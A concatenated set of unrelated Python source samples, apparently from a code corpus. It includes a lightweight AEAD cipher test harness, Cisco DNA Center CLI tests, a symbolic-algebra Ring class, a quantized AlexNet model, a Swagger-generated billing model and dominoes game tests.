def crypto_aead_decrypt(c, ad, nsec, npub, k, t_length_bytes):
joined_c_bits = bytearray_to_bits(c)
c_bits = joined_c_bits[:len(joined_c_bits)-t_length_bytes*8]
t_prime_bits = joined_c_bits[len(joined_c_bits)-t_length_bytes*8:]
ad_bits = bytearray_to_bits(ad)
npub_bits = bytearray_to_bits(npub)
k_bits = bytearray_to_bits(k)
m_bits, t_bits = subterranean_SAE_direct_decrypt(k_bits, npub_bits, ad_bits, c_bits, t_prime_bits, t_length_bytes*8)
if(t_bits == []):
return None
m = bits_to_bytearray(m_bits)
return m
if __name__ == "__main__":
k = bytearray([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])
k = bytearray([0x50, 0x95, 0x3C, 0x61, 0x25, 0x4B, 0xA5, 0xEA, 0x4E, 0xB5, 0xB7, 0x8C, 0xE3, 0x46, 0xC5, 0x46])
npub = bytearray([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15])
npub = bytearray([0xCF, 0x39, 0xCD, 0x54, 0x28, 0x5D, 0x19, 0x5E, 0xB8, 0x07, 0x65, 0xC6, 0x7B, 0x6E, 0x44, 0x77])
t_length_bytes = 16
m = bytearray([])
ad = bytearray([])
joined_c = crypto_aead_encrypt(m, ad, 0, npub, k, t_length_bytes)
print(binascii.hexlify(bytearray(joined_c)))
|
StarcoderdataPython
|
3364104
|
from .graclus import graclus_cluster
from .grid import grid_cluster
from .fps import fps
from .nearest import nearest
__version__ = '1.2.0'
__all__ = [
'graclus_cluster',
'grid_cluster',
'fps',
'nearest',
'__version__',
]
|
StarcoderdataPython
|
5047828
|
<reponame>Zotkin/incremental_learning.pytorch<filename>inclearn/lib/loops/__init__.py
from .generators import *
from .loops import *
|
StarcoderdataPython
|
3403563
|
from gevent.wsgi import WSGIServer
from config import CONTAINER_CONFIG
from ContainerService import container_service
visualizer_service_server = WSGIServer(('', CONTAINER_CONFIG["port"]), container_service)
visualizer_service_server.serve_forever()
|
StarcoderdataPython
|
291845
|
# -*- coding: utf-8 -*-
"""DNACenterAPI Application Policy API fixtures and tests.
Copyright (c) 2019 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import click
import pytest
from json import loads
from tests.environment import DNA_CENTER_VERSION
pytestmark = pytest.mark.skipif(DNA_CENTER_VERSION != '2.1.1', reason='version does not match')
def is_valid_get_applications_count(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_get_applications_count(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'get-applications-count',
"""--"""])
assert not result.exception
assert is_valid_get_applications_count(result)
def is_valid_create_application_set(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_create_application_set(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'create-application-set',
"""--active_validation=True""",
"""--payload='{"name": "string"}'"""])
assert not result.exception
assert is_valid_create_application_set(result)
def is_valid_edit_application(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_edit_application(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'edit-application',
"""--active_validation=True""",
"""--payload='{"id": "string", "name": "string", "networkApplications": [{"id": "string", "appProtocol": "string", "applicationSubType": "string", "applicationType": "string", "categoryId": "string", "displayName": "string", "engineId": "string", "helpString": "string", "longDescription": "string", "name": "string", "popularity": "string", "rank": "string", "trafficClass": "string", "serverName": "string", "url": "string", "dscp": "string", "ignoreConflict": "string"}], "networkIdentity": [{"id": "string", "displayName": "string", "lowerPort": "string", "ports": "string", "protocol": "string", "upperPort": "string"}], "applicationSet": {"idRef": "string"}}'"""])
assert not result.exception
assert is_valid_edit_application(result)
def is_valid_delete_application_set(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_delete_application_set(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'delete-application-set',
"""--id='string'"""])
assert not result.exception
assert is_valid_delete_application_set(result)
def is_valid_get_applications(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_get_applications(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'get-applications',
"""--limit=500""",
"""--name='string'""",
"""--offset=1"""])
assert not result.exception
assert is_valid_get_applications(result)
def is_valid_get_application_sets_count(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_get_application_sets_count(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'get-application-sets-count',
"""--"""])
assert not result.exception
assert is_valid_get_application_sets_count(result)
def is_valid_get_application_sets(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_get_application_sets(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'get-application-sets',
"""--limit=500""",
"""--name='string'""",
"""--offset=1"""])
assert not result.exception
assert is_valid_get_application_sets(result)
def is_valid_delete_application(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_delete_application(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'delete-application',
"""--id='string'"""])
assert not result.exception
assert is_valid_delete_application(result)
def is_valid_create_application(result):
data = result.output.strip()
return True if data else False
@pytest.mark.application_policy
def test_create_application(runner, cli, auth_options):
result = runner.invoke(cli, ['-v', '2.1.1', *auth_options,
'application-policy', 'create-application',
"""--active_validation=True""",
"""--payload='{"name": "string", "networkApplications": [{"appProtocol": "string", "applicationSubType": "string", "applicationType": "string", "categoryId": "string", "displayName": "string", "engineId": "string", "helpString": "string", "longDescription": "string", "name": "string", "popularity": "string", "rank": "string", "trafficClass": "string", "serverName": "string", "url": "string", "dscp": "string", "ignoreConflict": "string"}], "networkIdentity": [{"displayName": "string", "lowerPort": "string", "ports": "string", "protocol": "string", "upperPort": "string"}], "applicationSet": {"idRef": "string"}}'"""])
assert not result.exception
assert is_valid_create_application(result)
|
StarcoderdataPython
|
3204171
|
__all__ = ['Ring', 'CommutativeRing']
from ..basealgebra import Algebra
from .interface import RingInterface
from ..core import init_module, classes
init_module.import_heads()
init_module.import_numbers()
@init_module
def _init(m):
from ..arithmetic import mpq
Ring.coefftypes = (int, long, mpq)
class Ring(Algebra, RingInterface):
"""
Ring represents algebraic ring (R, +, *) where (R, +) is abelian
group, (R,*) is monoid, with distributivity.
"""
@classmethod
def get_function_algebra(cls):
return classes.FunctionRing
def __str__(self):
h, d = self.pair
return h.data_to_str_and_precedence(type(self), d)[0]
def __pos__(self):
return self
def __neg__(self):
return self.head.neg(type(self), self)
def __add__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.add_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.add(cls, self, other)
__radd__ = __add__
def __iadd__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.inplace_add(cls, self, other)
def __sub__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.sub_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.sub(cls, self, other)
def __rsub__(self, other):
return other + (-self)
def __isub__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.inplace_add(cls, self, -other)
def __mul__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
if tother in numbertypes_set:
return self.head.non_commutative_mul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.non_commutative_mul(cls, self, other)
def __rmul__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
if tother in numbertypes_set:
return self.head.non_commutative_rmul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other.head.non_commutative_mul(cls, other, self)
def __pow__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.pow_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self.head.pow(cls, self, other)
def __rpow__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other.head.pow(cls, other, self)
def __div__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.non_commutative_div_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return self * other**-1
def __rdiv__(self, other):
cls = type(self)
tother = type(other)
if cls is not tother:
other = cls.convert(other, typeerror=False)
if other is NotImplemented: return NotImplemented
return other * self**-1
__truediv__ = __div__
def expand(self):
return self.head.expand(type(self), self)
def evalf(self, n=None):
return self.head.evalf(type(self), self, n)
class CommutativeRing(Ring):
def __mul__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_mul_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.commutative_mul(cls, self, other)
__rmul__ = __mul__
def __imul__(self, other):
cls = type(self)
if type(other) is not cls:
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.inplace_commutative_mul(cls, self, other)
def __div__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_div_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return self.head.commutative_div(cls, self, other)
def __rdiv__(self, other):
cls = type(self)
tother = type(other)
if tother is not cls:
if tother in numbertypes_set:
return self.head.commutative_rdiv_number(cls, self, other)
other = cls.convert(other, typeerror=False)
if other is NotImplemented:
return NotImplemented
return other * self**-1
def to(self, target, *args):
""" Convert expression to target representation.
The following targets are recognized:
EXP_COEFF_DICT - convert expression to exponents-coefficient
representation, additional arguments are variables. When
no arguments are specified, variables will be all symbols
and non-power expressions used in the expression.
TERM_COEFF_DICT - convert expression to term-coefficient
representation. Note that the returned result may have
actual head NUMBER, SYMBOL, TERM_COEFF, POW, or
BASE_EXP_DICT instead of TERM_COEFF_DICT.
"""
head, data = self.pair
if target is head:
return self
if target is EXP_COEFF_DICT:
return head.to_EXP_COEFF_DICT(type(self), data, self, args or None)
if target is TERM_COEFF_DICT:
return head.to_TERM_COEFF_DICT(type(self), data, self)
raise NotImplementedError('%s.to(target=%r)' % (type(self), target))
def diff(self, symbol, order=1):
if order==0:
return self
cls = type(self)
if type(symbol) is cls:
assert symbol.head is SYMBOL,`symbol.pair`
symbol = symbol.data
elif isinstance(symbol, str):
pass
else:
raise TypeError('diff(symbol, order) first argument must be str or %s instance but got %s instance' % (cls.__name__, type(symbol).__name__))
try:
cache = {}
result = self.head.diff(cls, self.data, self, symbol, order, cache=cache)
finally:
cache.clear()
return result
def integrate(self, x):
cls = type(self)
t = type(x)
if t is tuple:
x, a, b = x
t = type(x)
else:
a, b = None, None
if t is cls:
assert x.head is SYMBOL,`x.pair`
x = x.data
elif t is str:
pass
else:
raise TypeError('integrate(x,..), x must be str or %s instance but got %s instance' % (cls.__name__, type(symbol).__name__))
if a is None:
return self.head.integrate_indefinite(cls, self.data, self, x)
if type(a) is not cls:
a = cls(a)
if type(b) is not cls:
b = cls(b)
return self.head.integrate_definite(cls, self.data, self, x, a, b)
classes.Ring = Ring
classes.CommutativeRing = CommutativeRing
|
StarcoderdataPython
|
305426
|
from flask import jsonify, make_response
from flask import render_template, Blueprint
main = Blueprint('main', __name__, template_folder='templates')
@main.route('/')
def index():
return render_template('main/index.html')
@main.route('/json')
def json():
return make_response(jsonify(response='Hello world'), 200)
|
StarcoderdataPython
|
9712482
|
# Code modified from the AlexNet implementation of torchvision(https://github.com/pytorch/vision/blob/master/torchvision/models/alexnet.py)
import torch
import logging
import torch.nn as nn
from torch.utils.model_zoo import load_url as load_state_dict_from_url
from .qa import Quantization
_name_translation = {
'features.0': 'features_0.0',
'features.3': 'features_1.1',
'features.6': 'features_2.1',
'features.8': 'features_2.3',
'features.10': 'features_2.5',
'classifier.1': 'classifier_0.1',
'classifier.4': 'classifier_1.1',
'classifier.6': 'classifier_1.3'
}
class AlexNet(nn.Module):
def __init__(self, num_classes=1000, QA_flag=False, QA_bias=None, QA_values=None, QA_beta=None,
QA_outlier_gamma=0.001):
super(AlexNet, self).__init__()
self.ac_quan_values = QA_values
self.ac_quan_bias = QA_bias
self.ac_beta = QA_beta
self.QA_flag = QA_flag
self.QA_inited = False
self.count = 0
if num_classes == 1000:
self.c = [64, 192, 384, 256, 256]
self.ks = [11, 5, 3, 3, 3]
self.s = [4, 1, 1, 1, 1]
self.p = [2, 2, 1, 1, 1]
self.pool_ks = 3
else:
self.c = [64, 192, 384, 256, 256]
self.ks = [3, 3, 3, 3, 3]
self.s = [2, 1, 1, 1, 1]
self.p = [1, 1, 1, 1, 1]
self.pool_ks = 2
self.features_0 = nn.Sequential(
nn.Conv2d(3, self.c[0], kernel_size=self.ks[0], stride=self.s[0], padding=self.p[0]),
nn.ReLU(inplace=True),
)
self.features_1 = nn.Sequential(
nn.MaxPool2d(kernel_size=self.pool_ks, stride=2),
nn.Conv2d(self.c[0], self.c[1], kernel_size=self.ks[1], stride=self.s[1], padding=self.p[1]),
nn.ReLU(inplace=True),
)
self.features_2 = nn.Sequential(
nn.MaxPool2d(kernel_size=self.pool_ks, stride=2),
nn.Conv2d(self.c[1], self.c[2], kernel_size=self.ks[2], stride=self.s[2], padding=self.p[2]),
nn.ReLU(inplace=True),
nn.Conv2d(self.c[2], self.c[3], kernel_size=self.ks[3], stride=self.s[3], padding=self.p[3]),
nn.ReLU(inplace=True),
nn.Conv2d(self.c[3], self.c[4], kernel_size=self.ks[4], stride=self.s[4], padding=self.p[4]),
nn.ReLU(inplace=True),
)
self.maxpool = nn.MaxPool2d(kernel_size=self.pool_ks, stride=2)
self.classifier_0 = nn.Sequential(
nn.Dropout(p=0.1),
nn.Linear(256 * 6 * 6 if num_classes == 1000 else 256 * 2 * 2, 4096),
nn.ReLU(inplace=True),
)
self.classifier_1 = nn.Sequential(
nn.Dropout(p=0.1),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
if self.QA_flag:
self.quan0 = Quantization(quant_values=self.ac_quan_values, outlier_gamma=QA_outlier_gamma)
self.quan1 = Quantization(quant_values=self.ac_quan_values, outlier_gamma=QA_outlier_gamma)
self.quan2 = Quantization(quant_values=self.ac_quan_values, outlier_gamma=QA_outlier_gamma)
self.quan3 = Quantization(quant_values=self.ac_quan_values, outlier_gamma=QA_outlier_gamma)
self.count = 4
def forward(self, x, input_ac_T=1):
x = self.features_0(x)
if self.QA_flag:
x = self.quan0(x, input_ac_T)
x = self.features_1(x)
if self.QA_flag:
x = self.quan1(x, input_ac_T)
x = self.features_2(x)
if self.QA_flag:
x = self.quan2(x, input_ac_T)
x = self.maxpool(x)
x = torch.flatten(x, 1)
x = self.classifier_0(x)
if self.QA_flag:
x = self.quan3(x, input_ac_T)
x = self.classifier_1(x)
return x
def alexnet(pretrained=False, **kwargs):
model = AlexNet(**kwargs)
if pretrained:
if 'num_classes' in kwargs.keys() and kwargs['num_classes'] != 1000:
logging.info('Can\'t load pre-trained model because target classes number isn\'t 1000(ImageNet).')
return model
model_path = 'https://download.pytorch.org/models/alexnet-owt-4df8aa71.pth'
state_dict = load_state_dict_from_url(model_path)
new_state_dict = dict()
# Names should be translated to meet
for key, value in state_dict.items():
split_name = key.split('.')
module_name = split_name[0] + '.' + split_name[1]
if module_name in _name_translation.keys():
new_state_dict[_name_translation[module_name] + key[len(module_name):]] = value
else:
new_state_dict[key] = value
model.load_state_dict(new_state_dict)
return model
|
StarcoderdataPython
|
6560189
|
<filename>ultracart/models/order_billing.py
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2
OpenAPI spec version: 2.0.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class OrderBilling(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'address1': 'str',
'address2': 'str',
'cc_emails': 'list[str]',
'city': 'str',
'company': 'str',
'country_code': 'str',
'day_phone': 'str',
'email': 'str',
'evening_phone': 'str',
'first_name': 'str',
'last_name': 'str',
'postal_code': 'str',
'state_region': 'str',
'title': 'str'
}
attribute_map = {
'address1': 'address1',
'address2': 'address2',
'cc_emails': 'cc_emails',
'city': 'city',
'company': 'company',
'country_code': 'country_code',
'day_phone': 'day_phone',
'email': 'email',
'evening_phone': 'evening_phone',
'first_name': 'first_name',
'last_name': 'last_name',
'postal_code': 'postal_code',
'state_region': 'state_region',
'title': 'title'
}
def __init__(self, address1=None, address2=None, cc_emails=None, city=None, company=None, country_code=None, day_phone=None, email=None, evening_phone=None, first_name=None, last_name=None, postal_code=None, state_region=None, title=None):
"""
OrderBilling - a model defined in Swagger
"""
self._address1 = None
self._address2 = None
self._cc_emails = None
self._city = None
self._company = None
self._country_code = None
self._day_phone = None
self._email = None
self._evening_phone = None
self._first_name = None
self._last_name = None
self._postal_code = None
self._state_region = None
self._title = None
self.discriminator = None
if address1 is not None:
self.address1 = address1
if address2 is not None:
self.address2 = address2
if cc_emails is not None:
self.cc_emails = cc_emails
if city is not None:
self.city = city
if company is not None:
self.company = company
if country_code is not None:
self.country_code = country_code
if day_phone is not None:
self.day_phone = day_phone
if email is not None:
self.email = email
if evening_phone is not None:
self.evening_phone = evening_phone
if first_name is not None:
self.first_name = first_name
if last_name is not None:
self.last_name = last_name
if postal_code is not None:
self.postal_code = postal_code
if state_region is not None:
self.state_region = state_region
if title is not None:
self.title = title
@property
def address1(self):
"""
Gets the address1 of this OrderBilling.
Address line 1
:return: The address1 of this OrderBilling.
:rtype: str
"""
return self._address1
@address1.setter
def address1(self, address1):
"""
Sets the address1 of this OrderBilling.
Address line 1
:param address1: The address1 of this OrderBilling.
:type: str
"""
if address1 is not None and len(address1) > 50:
raise ValueError("Invalid value for `address1`, length must be less than or equal to `50`")
self._address1 = address1
@property
def address2(self):
"""
Gets the address2 of this OrderBilling.
Address line 2
:return: The address2 of this OrderBilling.
:rtype: str
"""
return self._address2
@address2.setter
def address2(self, address2):
"""
Sets the address2 of this OrderBilling.
Address line 2
:param address2: The address2 of this OrderBilling.
:type: str
"""
if address2 is not None and len(address2) > 50:
raise ValueError("Invalid value for `address2`, length must be less than or equal to `50`")
self._address2 = address2
@property
def cc_emails(self):
"""
Gets the cc_emails of this OrderBilling.
CC emails. Multiple allowed, but total length of all emails can not exceed 100 characters.
:return: The cc_emails of this OrderBilling.
:rtype: list[str]
"""
return self._cc_emails
@cc_emails.setter
def cc_emails(self, cc_emails):
"""
Sets the cc_emails of this OrderBilling.
CC emails. Multiple allowed, but total length of all emails can not exceed 100 characters.
:param cc_emails: The cc_emails of this OrderBilling.
:type: list[str]
"""
self._cc_emails = cc_emails
@property
def city(self):
"""
Gets the city of this OrderBilling.
City
:return: The city of this OrderBilling.
:rtype: str
"""
return self._city
@city.setter
def city(self, city):
"""
Sets the city of this OrderBilling.
City
:param city: The city of this OrderBilling.
:type: str
"""
if city is not None and len(city) > 32:
raise ValueError("Invalid value for `city`, length must be less than or equal to `32`")
self._city = city
@property
def company(self):
"""
Gets the company of this OrderBilling.
Company
:return: The company of this OrderBilling.
:rtype: str
"""
return self._company
@company.setter
def company(self, company):
"""
Sets the company of this OrderBilling.
Company
:param company: The company of this OrderBilling.
:type: str
"""
if company is not None and len(company) > 50:
raise ValueError("Invalid value for `company`, length must be less than or equal to `50`")
self._company = company
@property
def country_code(self):
"""
Gets the country_code of this OrderBilling.
ISO-3166 two letter country code
:return: The country_code of this OrderBilling.
:rtype: str
"""
return self._country_code
@country_code.setter
def country_code(self, country_code):
"""
Sets the country_code of this OrderBilling.
ISO-3166 two letter country code
:param country_code: The country_code of this OrderBilling.
:type: str
"""
if country_code is not None and len(country_code) > 2:
raise ValueError("Invalid value for `country_code`, length must be less than or equal to `2`")
self._country_code = country_code
@property
def day_phone(self):
"""
Gets the day_phone of this OrderBilling.
Day time phone
:return: The day_phone of this OrderBilling.
:rtype: str
"""
return self._day_phone
@day_phone.setter
def day_phone(self, day_phone):
"""
Sets the day_phone of this OrderBilling.
Day time phone
:param day_phone: The day_phone of this OrderBilling.
:type: str
"""
if day_phone is not None and len(day_phone) > 25:
raise ValueError("Invalid value for `day_phone`, length must be less than or equal to `25`")
self._day_phone = day_phone
@property
def email(self):
"""
Gets the email of this OrderBilling.
Email
:return: The email of this OrderBilling.
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""
Sets the email of this OrderBilling.
Email
:param email: The email of this OrderBilling.
:type: str
"""
if email is not None and len(email) > 100:
raise ValueError("Invalid value for `email`, length must be less than or equal to `100`")
self._email = email
@property
def evening_phone(self):
"""
Gets the evening_phone of this OrderBilling.
Evening phone
:return: The evening_phone of this OrderBilling.
:rtype: str
"""
return self._evening_phone
@evening_phone.setter
def evening_phone(self, evening_phone):
"""
Sets the evening_phone of this OrderBilling.
Evening phone
:param evening_phone: The evening_phone of this OrderBilling.
:type: str
"""
if evening_phone is not None and len(evening_phone) > 25:
raise ValueError("Invalid value for `evening_phone`, length must be less than or equal to `25`")
self._evening_phone = evening_phone
@property
def first_name(self):
"""
Gets the first_name of this OrderBilling.
First name
:return: The first_name of this OrderBilling.
:rtype: str
"""
return self._first_name
@first_name.setter
def first_name(self, first_name):
"""
Sets the first_name of this OrderBilling.
First name
:param first_name: The first_name of this OrderBilling.
:type: str
"""
if first_name is not None and len(first_name) > 30:
raise ValueError("Invalid value for `first_name`, length must be less than or equal to `30`")
self._first_name = first_name
@property
def last_name(self):
"""
Gets the last_name of this OrderBilling.
Last name
:return: The last_name of this OrderBilling.
:rtype: str
"""
return self._last_name
@last_name.setter
def last_name(self, last_name):
"""
Sets the last_name of this OrderBilling.
Last name
:param last_name: The last_name of this OrderBilling.
:type: str
"""
if last_name is not None and len(last_name) > 30:
raise ValueError("Invalid value for `last_name`, length must be less than or equal to `30`")
self._last_name = last_name
@property
def postal_code(self):
"""
Gets the postal_code of this OrderBilling.
Postal code
:return: The postal_code of this OrderBilling.
:rtype: str
"""
return self._postal_code
@postal_code.setter
def postal_code(self, postal_code):
"""
Sets the postal_code of this OrderBilling.
Postal code
:param postal_code: The postal_code of this OrderBilling.
:type: str
"""
if postal_code is not None and len(postal_code) > 20:
raise ValueError("Invalid value for `postal_code`, length must be less than or equal to `20`")
self._postal_code = postal_code
@property
def state_region(self):
"""
Gets the state_region of this OrderBilling.
State for United States otherwise region or province for other countries
:return: The state_region of this OrderBilling.
:rtype: str
"""
return self._state_region
@state_region.setter
def state_region(self, state_region):
"""
Sets the state_region of this OrderBilling.
State for United States otherwise region or province for other countries
:param state_region: The state_region of this OrderBilling.
:type: str
"""
if state_region is not None and len(state_region) > 32:
raise ValueError("Invalid value for `state_region`, length must be less than or equal to `32`")
self._state_region = state_region
@property
def title(self):
"""
Gets the title of this OrderBilling.
Title
:return: The title of this OrderBilling.
:rtype: str
"""
return self._title
@title.setter
def title(self, title):
"""
Sets the title of this OrderBilling.
Title
:param title: The title of this OrderBilling.
:type: str
"""
if title is not None and len(title) > 50:
raise ValueError("Invalid value for `title`, length must be less than or equal to `50`")
self._title = title
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, OrderBilling):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
StarcoderdataPython
|
140363
|
import collections
import dominoes
import unittest
class TestSeries(unittest.TestCase):
def test_init(self):
s1 = dominoes.Series()
self.assertEqual(len(s1.games), 1)
self.assertEqual(len(s1.games[0].board), 1)
self.assertEqual(s1.games[0].board.left_end(), 6)
self.assertEqual(s1.games[0].board.right_end(), 6)
hand_lengths1 = collections.Counter(len(h) for h in s1.games[0].hands)
self.assertEqual(hand_lengths1[6], 1)
self.assertEqual(hand_lengths1[7], 3)
self.assertTrue(s1.games[0].turn in range(4))
self.assertTrue(bool(s1.games[0].valid_moves))
self.assertIsNone(s1.games[0].result)
self.assertEqual(s1.scores, [0, 0])
self.assertEqual(s1.target_score, 200)
s2 = dominoes.Series(target_score=100)
self.assertEqual(len(s2.games), 1)
self.assertEqual(len(s2.games[0].board), 1)
self.assertEqual(s2.games[0].board.left_end(), 6)
self.assertEqual(s2.games[0].board.right_end(), 6)
hand_lengths2 = collections.Counter(len(h) for h in s2.games[0].hands)
self.assertEqual(hand_lengths2[6], 1)
self.assertEqual(hand_lengths2[7], 3)
self.assertTrue(s2.games[0].turn in range(4))
self.assertTrue(bool(s2.games[0].valid_moves))
self.assertIsNone(s2.games[0].result)
self.assertEqual(s2.scores, [0, 0])
self.assertEqual(s2.target_score, 100)
d = dominoes.Domino(1, 2)
s3 = dominoes.Series(starting_domino=d)
self.assertEqual(len(s3.games), 1)
self.assertEqual(len(s3.games[0].board), 1)
self.assertEqual(s3.games[0].board.left_end(), 1)
self.assertEqual(s3.games[0].board.right_end(), 2)
hand_lengths3 = collections.Counter(len(h) for h in s3.games[0].hands)
self.assertEqual(hand_lengths3[6], 1)
self.assertEqual(hand_lengths3[7], 3)
self.assertTrue(s3.games[0].turn in range(4))
self.assertTrue(bool(s3.games[0].valid_moves))
self.assertIsNone(s3.games[0].result)
self.assertEqual(s3.scores, [0, 0])
self.assertEqual(s3.target_score, 200)
def test_is_over(self):
s = dominoes.Series()
self.assertFalse(s.is_over())
s.scores = [199, 199]
self.assertFalse(s.is_over())
s.scores = [200, 199]
self.assertTrue(s.is_over())
s.scores = [199, 200]
self.assertTrue(s.is_over())
s.scores = [200, 200]
self.assertTrue(s.is_over())
s.scores = [201, 201]
self.assertTrue(s.is_over())
def test_next_game(self):
s = dominoes.Series()
str1 = str(s)
repr1 = repr(s)
self.assertRaises(dominoes.GameInProgressException, s.next_game)
self.assertEqual(len(s.games), 1)
self.assertEqual(len(s.games[0].board), 1)
self.assertTrue(bool(s.games[0].valid_moves))
self.assertIsNone(s.games[0].result)
self.assertEqual(s.scores, [0, 0])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str1)
self.assertTrue('Team 0 has 0 points.' in str1)
self.assertTrue('Team 1 has 0 points.' in str1)
self.assertEqual(str1, repr1)
scores = [200, 200]
s.scores = scores
str2 = str(s)
repr2 = repr(s)
self.assertRaises(dominoes.SeriesOverException, s.next_game)
self.assertEqual(len(s.games), 1)
self.assertEqual(len(s.games[0].board), 1)
self.assertTrue(bool(s.games[0].valid_moves))
self.assertIsNone(s.games[0].result)
self.assertEqual(s.scores, scores)
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str2)
self.assertTrue('Team 0 has 200 points.' in str2)
self.assertTrue('Team 1 has 200 points.' in str2)
self.assertEqual(str2, repr2)
s.scores = [0, 0]
s.games[0].result = dominoes.Result(0, True, 50)
g1 = s.next_game()
str3 = str(s)
repr3 = repr(s)
self.assertEqual(len(s.games), 2)
self.assertEqual(len(g1.board), 0)
self.assertEqual(g1.turn, 0)
self.assertTrue(bool(g1.valid_moves))
self.assertIsNone(g1.result)
self.assertEqual(s.scores, [50, 0])
self.assertEqual(s.target_score, 200)
self.assertTrue('Series to 200 points:' in str3)
self.assertTrue('Team 0 has 50 points.' in str3)
self.assertTrue('Team 1 has 0 points.' in str3)
self.assertEqual(str3, repr3)
s.games[1].result = dominoes.Result(1, False, 50)
g2 = s.next_game()
str4 = str(s)
repr4 = repr(s)
self.assertEqual(len(s.games), 3)
self.assertEqual(len(g2.board), 0)
self.assertEqual(g2.turn, 2)
self.assertTrue(bool(g2.valid_moves))
self.assertIsNone(g2.result)
